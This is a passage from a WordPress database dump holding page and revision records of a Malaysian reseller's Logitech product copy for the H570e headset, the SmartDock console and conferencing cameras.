optimized so you can hear and be heard, even in noisy workspaces.</p><h4>NO-LOOK INLINE CONTROLS</h4><p>Control the call with answer/end, volume up/down and mute buttons. A flat and flexible cable resists tangles.</p><h4>OPTIMIZED FOR VOICE AND MUSIC</h4><p>A dynamic equalizer automatically switches between voice and music modes, delivering the best sound quality for what the user is listening to.</p>','Logitech H570E Headset','','inherit','closed','closed','','3009-revision-v1','','','2019-03-05 16:15:59','2019-03-05 08:15:59','',3009,'https://bintara.com.my/blog/2019/03/05/3009-revision-v1/',0,'revision','',0),(3030,1,'2019-03-05 16:16:20','2019-03-05 08:16:20','<h2>LOGITECH H570E HEADSET</h2><p>Comfortable, affordable, and built to last</p><ul><li>Strong and light for long-term comfort</li><li>Easy-to-find inline controls</li><li>Clear audio at a great price</li></ul>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-1.png 687w, https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-1-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h2>AFFORDABLE CLARITY AND COMFORT</h2><p>For people who make their living on the phone, a comfortable headset makes every call more productive. Stylish and durable, the Logitech H570e Headset delivers comfort day after day. Itâ€™s easy to use as well: just connect it to a PC or MacÂ® through the USB cable. The H570e includes premium noise-cancelling features for crystal clear sound at an affordable price.</p>		\n			<h4>KEY FEATURES</h4>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>GREAT VALUE FOR GREAT FEATURES</h3><p>The Logitech H570e Headset offers premium features at an affordable price. Acoustic echo cancellation, a noise-cancelling mic, and digital signal processing (DSP) block out unwanted noise for clear conversations with great sound quality. Choose H570e Mono or H570e Stereo for one or two speakers.</p><h3>COMFORTABLE AND LONG-LASTING</h3><p>Business people on the phone for hours will enjoy the comfort of this headset. Stylish, lightweight design and durable materials mean you can wear the H570e all day. Leatherette ear pads, plus padded headband with metal reinforcement provides strength and flexibility, with a fit that feels just right.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>REINFORCED PADDED HEADBAND</h4><p>Durable and adjustable padded headband can be worn comfortably all day while metal reinforcement provides strength, flexibility, and â€œjust the rightâ€ fit.</p><h4>NOISE &amp; ECHO CANCELLATION</h4><p>With acoustic echo cancellation and a noise-cancelling microphone, H570e is optimized so you can hear and be heard, even in noisy workspaces.</p><h4>NO-LOOK INLINE CONTROLS</h4><p>Control the call with answer/end, volume up/down and mute buttons. A flat and flexible cable resists tangles.</p><h4>OPTIMIZED FOR VOICE AND MUSIC</h4><p>A dynamic equalizer automatically switches between voice and music modes, delivering the best sound quality for what the user is listening to.</p>','Logitech H570E Headset','','inherit','closed','closed','','3009-revision-v1','','','2019-03-05 16:16:20','2019-03-05 08:16:20','',3009,'https://bintara.com.my/blog/2019/03/05/3009-revision-v1/',0,'revision','',0),(3031,1,'2019-03-05 16:26:32','2019-03-05 08:26:32','<h2>SMARTDOCK</h2><p>Secure meeting room console designed for Skype Room Systems</p><ul><li>Securely mount Surfaceâ„¢ Pro in any conference room</li><li>Start your Skype for Business meeting with one-touch join</li><li>Add connectivity without clutter</li></ul>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1.png 687w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h2>SMARTDOCK MAKES SKYPE ROOMS EASY</h2><p>Add video collaboration to any room with LogitechÂ® SmartDock for Skype Room Systems and start every meeting with just one touch. Meeting organizers enjoy the familiar Skype for Business interface, and IT admins appreciate the easily deployed and managed WindowsÂ® 10 Skype meeting app.</p>		\n			<h4>KEY FEATURES</h4>		\n		https://youtu.be/EqZbHTEVfvA<h3>PERFECT FOR SKYPE FOR BUSINESS</h3><p>Logitech SmartDock meeting room solution, designed for Microsoft SkypeÂ® for Business, works beautifully with your existing video displays and video cameras certified for Skype for Business, making it easy to launch a meeting with a single touch.</p><h3>SECURELY LOCKS SURFACE PRO</h3><p>SmartDock is an AV control console and powered mount with KensingtonÂ® security slot for added protection. Confidently leave a SurfaceÂ® Pro unattended in any conference room where SmartDock is installed. Convenience for meeting organizers, peace of mind for IT.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>ADDS CONNECTIVITY WITHOUT CLUTTER</h3><p>SmartDock adds all the connectivity you could want, including HDMI for dual 1080p displays, three USB ports, Gigabit Ethernet, and headset jack. The optional SmartDock Flex expansion kit consolidates HDMI, USB and power to a single CAT6 cable for a clutter-free conference table.</p><h3>SIMPLIFIES CONTENT SHARING</h3><p>When you need to share a presentation, demo, or other content on your laptop, simply connect through the HDMI input built into SmartDock and begin presenting from your personal device.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-2.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-2.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-2-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-3.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-3.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-3-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-3-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>COMPLETE THE EXPERIENCE</h3><p>All Logitech ConferenceCams are certified for Skype for Business, providing an affordable option for any meeting room. HD-quality video and audio enhance the Skype meeting experience for superior group collaboration.</p>		\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>PIVOTING, CAST-METAL SUPPORT PLATFORM</h4><p>The sturdy, elegantly designed base provides a premium mount for Surface Pro with sleek industrial design.</p><h4>EXTENDED I/O FOR SURFACE PRO</h4><p>Supports a wide variety of deployments and device connectivity with dual 1080p display ports, an HDMI input for 1080p60 content sharing, three USB 3.1 type A ports, Gigabit Ethernet, and a headset mini-plug.</p><h4>ENERGY-SAVING HIBERNATION</h4><p>An IR sensor conveniently wakes the system when motion is detected in the meeting space and enables energy saving hibernation mode when the room is empty.</p><h4>DESIGNED IN PARTNERSHIP WITH MICROSOFT</h4><p>Close collaboration between Logitech and Microsoft ensures full and seamless integration with Surface Pro and Skype Room System. In addition to SmartDock, all Logitech ConferenceCams are Certified for Skype for Business.</p><h4>SUPERIOR CABLE MANAGEMENT</h4><p>The optional SmartDock Flex expansion kit makes it easy to manage cabling between the conference table and the front of the room. With a low-profile base for SmartDock and an easily-concealable extender box, SmartDock Flex consolidates USB, dual HDMI, data, and power to a single CAT6 cable. With a maximum cable length of 15 m, installers can position SmartDock anywhere in the room while running cable through standard 21mm conduit.</p><h4>EASY ACCESS TO ROOM AV</h4><p>Need to join a meeting outside the Microsoft ecosystem? When deployed with the optional SmartDock Flex expansion kit, SmartDock makes the roomâ€™s camera, speakerphone, and display accessible to a userâ€™s laptop. This way, equipment in Skype rooms can be used with Cisco WebEx, Zoom, BlueJeans, and most any meeting or webinar software.</p>','Logitech SMARTDOCK','','publish','closed','closed','','logitech-smartdock','','','2019-03-05 16:46:17','2019-03-05 08:46:17','',0,'https://bintara.com.my/?page_id=3031',0,'page','',0),(3032,1,'2019-03-05 16:26:32','2019-03-05 08:26:32','','Logitech SMARTDOCK','','inherit','closed','closed','','3031-revision-v1','','','2019-03-05 16:26:32','2019-03-05 08:26:32','',3031,'https://bintara.com.my/blog/2019/03/05/3031-revision-v1/',0,'revision','',0),(3033,1,'2019-03-05 16:31:59','2019-03-05 08:31:59','','smartdock (1)','','inherit','closed','closed','','smartdock-1','','','2019-03-05 16:31:59','2019-03-05 08:31:59','',3031,'https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1.png',0,'attachment','image/png',0),(3034,1,'2019-03-05 16:35:43','2019-03-05 08:35:43','','smartdock','','inherit','closed','closed','','smartdock-2','','','2019-03-05 16:35:43','2019-03-05 08:35:43','',3031,'https://bintara.com.my/wp-content/uploads/2019/03/smartdock.jpg',0,'attachment','image/jpeg',0),(3035,1,'2019-03-05 16:36:46','2019-03-05 08:36:46','','smartdock (1)','','inherit','closed','closed','','smartdock-1-2','','','2019-03-05 16:36:46','2019-03-05 08:36:46','',3031,'https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1.jpg',0,'attachment','image/jpeg',0),(3036,1,'2019-03-05 16:38:00','2019-03-05 08:38:00','','smartdock (2)','','inherit','closed','closed','','smartdock-2-2','','','2019-03-05 16:38:00','2019-03-05 08:38:00','',3031,'https://bintara.com.my/wp-content/uploads/2019/03/smartdock-2.jpg',0,'attachment','image/jpeg',0),(3037,1,'2019-03-05 16:38:57','2019-03-05 08:38:57','','smartdock (3)','','inherit','closed','closed','','smartdock-3','','','2019-03-05 16:38:57','2019-03-05 08:38:57','',3031,'https://bintara.com.my/wp-content/uploads/2019/03/smartdock-3.jpg',0,'attachment','image/jpeg',0),(3038,1,'2019-03-05 16:42:04','2019-03-05 08:42:04','<h2>SMARTDOCK</h2><p>Secure meeting room console designed for Skype Room Systems</p><ul><li>Securely mount Surfaceâ„¢ Pro in any conference room</li><li>Start your Skype for Business meeting with one-touch join</li><li>Add connectivity without clutter</li></ul>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1.png 687w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h2>SMARTDOCK MAKES SKYPE ROOMS EASY</h2><p>Add video collaboration to any room with LogitechÂ® SmartDock for Skype Room Systems and start every meeting with just one touch. Meeting organizers enjoy the familiar Skype for Business interface, and IT admins appreciate the easily deployed and managed WindowsÂ® 10 Skype meeting app.</p>		\n			<h4>KEY FEATURES</h4>		\n		https://youtu.be/EqZbHTEVfvA<p>PERFECT FOR SKYPE FOR BUSINESS</p><p>Logitech SmartDock meeting room solution, designed for Microsoft SkypeÂ® for Business, works beautifully with your existing video displays and video cameras certified for Skype for Business, making it easy to launch a meeting with a single touch.</p><h3>SECURELY LOCKS SURFACE PRO</h3><p>SmartDock is an AV control console and powered mount with KensingtonÂ® security slot for added protection. Confidently leave a SurfaceÂ® Pro unattended in any conference room where SmartDock is installed. Convenience for meeting organizers, peace of mind for IT.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>ADDS CONNECTIVITY WITHOUT CLUTTER</h3><p>SmartDock adds all the connectivity you could want, including HDMI for dual 1080p displays, three USB ports, Gigabit Ethernet, and headset jack. The optional SmartDock Flex expansion kit consolidates HDMI, USB and power to a single CAT6 cable for a clutter-free conference table.</p><h3>SIMPLIFIES CONTENT SHARING</h3><p>When you need to share a presentation, demo, or other content on your laptop, simply connect through the HDMI input built into SmartDock and begin presenting from your personal device.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-2.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-2.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-2-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-3.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-3.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-3-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-3-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>COMPLETE THE EXPERIENCE</h3><p>All Logitech ConferenceCams are certified for Skype for Business, providing an affordable option for any meeting room. HD-quality video and audio enhance the Skype meeting experience for superior group collaboration.</p>		\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>PIVOTING, CAST-METAL SUPPORT PLATFORM</h4><p>The sturdy, elegantly designed base provides a premium mount for Surface Pro with sleek industrial design.</p><h4>EXTENDED I/O FOR SURFACE PRO</h4><p>Supports a wide variety of deployments and device connectivity with dual 1080p display ports, an HDMI input for 1080p60 content sharing, three USB 3.1 type A ports, Gigabit Ethernet, and a headset mini-plug.</p><h4>ENERGY-SAVING HIBERNATION</h4><p>An IR sensor conveniently wakes the system when motion is detected in the meeting space and enables energy saving hibernation mode when the room is empty.</p><h4>DESIGNED IN PARTNERSHIP WITH MICROSOFT</h4><p>Close collaboration between Logitech and Microsoft ensures full and seamless integration with Surface Pro and Skype Room System. In addition to SmartDock, all Logitech ConferenceCams are Certified for Skype for Business.</p><h4>SUPERIOR CABLE MANAGEMENT</h4><p>The optional SmartDock Flex expansion kit makes it easy to manage cabling between the conference table and the front of the room. With a low-profile base for SmartDock and an easily-concealable extender box, SmartDock Flex consolidates USB, dual HDMI, data, and power to a single CAT6 cable. With a maximum cable length of 15 m, installers can position SmartDock anywhere in the room while running cable through standard 21mm conduit.</p><h4>EASY ACCESS TO ROOM AV</h4><p>Need to join a meeting outside the Microsoft ecosystem? When deployed with the optional SmartDock Flex expansion kit, SmartDock makes the roomâ€™s camera, speakerphone, and display accessible to a userâ€™s laptop. This way, equipment in Skype rooms can be used with Cisco WebEx, Zoom, BlueJeans, and most any meeting or webinar software.</p>','Logitech SMARTDOCK','','inherit','closed','closed','','3031-revision-v1','','','2019-03-05 16:42:04','2019-03-05 08:42:04','',3031,'https://bintara.com.my/blog/2019/03/05/3031-revision-v1/',0,'revision','',0);
INSERT INTO `wpdp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES (3039,1,'2019-03-05 16:45:40','2019-03-05 08:45:40','<h2>SMARTDOCK</h2><p>Secure meeting room console designed for Skype Room Systems</p><ul><li>Securely mount Surfaceâ„¢ Pro in any conference room</li><li>Start your Skype for Business meeting with one-touch join</li><li>Add connectivity without clutter</li></ul>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1.png 687w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h2>SMARTDOCK MAKES SKYPE ROOMS EASY</h2><p>Add video collaboration to any room with LogitechÂ® SmartDock for Skype Room Systems and start every meeting with just one touch. Meeting organizers enjoy the familiar Skype for Business interface, and IT admins appreciate the easily deployed and managed WindowsÂ® 10 Skype meeting app.</p>		\n			<h4>KEY FEATURES</h4>		\n		https://youtu.be/EqZbHTEVfvA<h3>PERFECT FOR SKYPE FOR BUSINESS</h3><p>Logitech SmartDock meeting room solution, designed for Microsoft SkypeÂ® for Business, works beautifully with your existing video displays and video cameras certified for Skype for Business, making it easy to launch a meeting with a single touch.</p><h3>SECURELY LOCKS SURFACE PRO</h3><p>SmartDock is an AV control console and powered mount with KensingtonÂ® security slot for added protection. Confidently leave a SurfaceÂ® Pro unattended in any conference room where SmartDock is installed. Convenience for meeting organizers, peace of mind for IT.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>ADDS CONNECTIVITY WITHOUT CLUTTER</h3><p>SmartDock adds all the connectivity you could want, including HDMI for dual 1080p displays, three USB ports, Gigabit Ethernet, and headset jack. The optional SmartDock Flex expansion kit consolidates HDMI, USB and power to a single CAT6 cable for a clutter-free conference table.</p><h3>SIMPLIFIES CONTENT SHARING</h3><p>When you need to share a presentation, demo, or other content on your laptop, simply connect through the HDMI input built into SmartDock and begin presenting from your personal device.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-2.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-2.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-2-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-3.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-3.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-3-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-3-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>COMPLETE THE EXPERIENCE</h3><p>All Logitech ConferenceCams are certified for Skype for Business, providing an affordable option for any meeting room. HD-quality video and audio enhance the Skype meeting experience for superior group collaboration.</p>		\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>PIVOTING, CAST-METAL SUPPORT PLATFORM</h4><p>The sturdy, elegantly designed base provides a premium mount for Surface Pro with sleek industrial design.</p><h4>EXTENDED I/O FOR SURFACE PRO</h4><p>Supports a wide variety of deployments and device connectivity with dual 1080p display ports, an HDMI input for 1080p60 content sharing, three USB 3.1 type A ports, Gigabit Ethernet, and a headset mini-plug.</p><h4>ENERGY-SAVING HIBERNATION</h4><p>An IR sensor conveniently wakes the system when motion is detected in the meeting space and enables energy saving hibernation mode when the room is empty.</p><h4>DESIGNED IN PARTNERSHIP WITH MICROSOFT</h4><p>Close collaboration between Logitech and Microsoft ensures full and seamless integration with Surface Pro and Skype Room System. In addition to SmartDock, all Logitech ConferenceCams are Certified for Skype for Business.</p><h4>SUPERIOR CABLE MANAGEMENT</h4><p>The optional SmartDock Flex expansion kit makes it easy to manage cabling between the conference table and the front of the room. With a low-profile base for SmartDock and an easily-concealable extender box, SmartDock Flex consolidates USB, dual HDMI, data, and power to a single CAT6 cable. With a maximum cable length of 15 m, installers can position SmartDock anywhere in the room while running cable through standard 21mm conduit.</p><h4>EASY ACCESS TO ROOM AV</h4><p>Need to join a meeting outside the Microsoft ecosystem? When deployed with the optional SmartDock Flex expansion kit, SmartDock makes the roomâ€™s camera, speakerphone, and display accessible to a userâ€™s laptop. This way, equipment in Skype rooms can be used with Cisco WebEx, Zoom, BlueJeans, and most any meeting or webinar software.</p>','Logitech SMARTDOCK','','inherit','closed','closed','','3031-revision-v1','','','2019-03-05 16:45:40','2019-03-05 08:45:40','',3031,'https://bintara.com.my/blog/2019/03/05/3031-revision-v1/',0,'revision','',0),(3040,1,'2019-03-05 16:46:17','2019-03-05 08:46:17','<h2>SMARTDOCK</h2><p>Secure meeting room console designed for Skype Room Systems</p><ul><li>Securely mount Surfaceâ„¢ Pro in any conference room</li><li>Start your Skype for Business meeting with one-touch join</li><li>Add connectivity without clutter</li></ul>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1.png 687w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h2>SMARTDOCK MAKES SKYPE ROOMS EASY</h2><p>Add video collaboration to any room with LogitechÂ® SmartDock for Skype Room Systems and start every meeting with just one touch. Meeting organizers enjoy the familiar Skype for Business interface, and IT admins appreciate the easily deployed and managed WindowsÂ® 10 Skype meeting app.</p>		\n			<h4>KEY FEATURES</h4>		\n		https://youtu.be/EqZbHTEVfvA<h3>PERFECT FOR SKYPE FOR BUSINESS</h3><p>Logitech SmartDock meeting room solution, designed for Microsoft SkypeÂ® for Business, works beautifully with your existing video displays and video cameras certified for Skype for Business, making it easy to launch a meeting with a single touch.</p><h3>SECURELY LOCKS SURFACE PRO</h3><p>SmartDock is an AV control console and powered mount with KensingtonÂ® security slot for added protection. Confidently leave a SurfaceÂ® Pro unattended in any conference room where SmartDock is installed. Convenience for meeting organizers, peace of mind for IT.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>ADDS CONNECTIVITY WITHOUT CLUTTER</h3><p>SmartDock adds all the connectivity you could want, including HDMI for dual 1080p displays, three USB ports, Gigabit Ethernet, and headset jack. The optional SmartDock Flex expansion kit consolidates HDMI, USB and power to a single CAT6 cable for a clutter-free conference table.</p><h3>SIMPLIFIES CONTENT SHARING</h3><p>When you need to share a presentation, demo, or other content on your laptop, simply connect through the HDMI input built into SmartDock and begin presenting from your personal device.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-2.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-2.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-2-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-3.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/smartdock-3.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-3-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/smartdock-3-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>COMPLETE THE EXPERIENCE</h3><p>All Logitech ConferenceCams are certified for Skype for Business, providing an affordable option for any meeting room. HD-quality video and audio enhance the Skype meeting experience for superior group collaboration.</p>		\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>PIVOTING, CAST-METAL SUPPORT PLATFORM</h4><p>The sturdy, elegantly designed base provides a premium mount for Surface Pro with sleek industrial design.</p><h4>EXTENDED I/O FOR SURFACE PRO</h4><p>Supports a wide variety of deployments and device connectivity with dual 1080p display ports, an HDMI input for 1080p60 content sharing, three USB 3.1 type A ports, Gigabit Ethernet, and a headset mini-plug.</p><h4>ENERGY-SAVING HIBERNATION</h4><p>An IR sensor conveniently wakes the system when motion is detected in the meeting space and enables energy saving hibernation mode when the room is empty.</p><h4>DESIGNED IN PARTNERSHIP WITH MICROSOFT</h4><p>Close collaboration between Logitech and Microsoft ensures full and seamless integration with Surface Pro and Skype Room System. In addition to SmartDock, all Logitech ConferenceCams are Certified for Skype for Business.</p><h4>SUPERIOR CABLE MANAGEMENT</h4><p>The optional SmartDock Flex expansion kit makes it easy to manage cabling between the conference table and the front of the room. With a low-profile base for SmartDock and an easily-concealable extender box, SmartDock Flex consolidates USB, dual HDMI, data, and power to a single CAT6 cable. With a maximum cable length of 15 m, installers can position SmartDock anywhere in the room while running cable through standard 21mm conduit.</p><h4>EASY ACCESS TO ROOM AV</h4><p>Need to join a meeting outside the Microsoft ecosystem? When deployed with the optional SmartDock Flex expansion kit, SmartDock makes the roomâ€™s camera, speakerphone, and display accessible to a userâ€™s laptop. This way, equipment in Skype rooms can be used with Cisco WebEx, Zoom, BlueJeans, and most any meeting or webinar software.</p>','Logitech SMARTDOCK','','inherit','closed','closed','','3031-revision-v1','','','2019-03-05 16:46:17','2019-03-05 08:46:17','',3031,'https://bintara.com.my/blog/2019/03/05/3031-revision-v1/',0,'revision','',0),(3041,1,'2019-03-05 17:22:50','2019-03-05 09:22:50','<h2>VIDEO CONFERENCINGâ€‹</h2>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>CONFERENCE CAMERAS</h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.</p>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h3>GROUP</h3><p>Video conferencing for mid to large-sized meeting rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-group/\" role=\"button\">\n						View\n					</a>\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 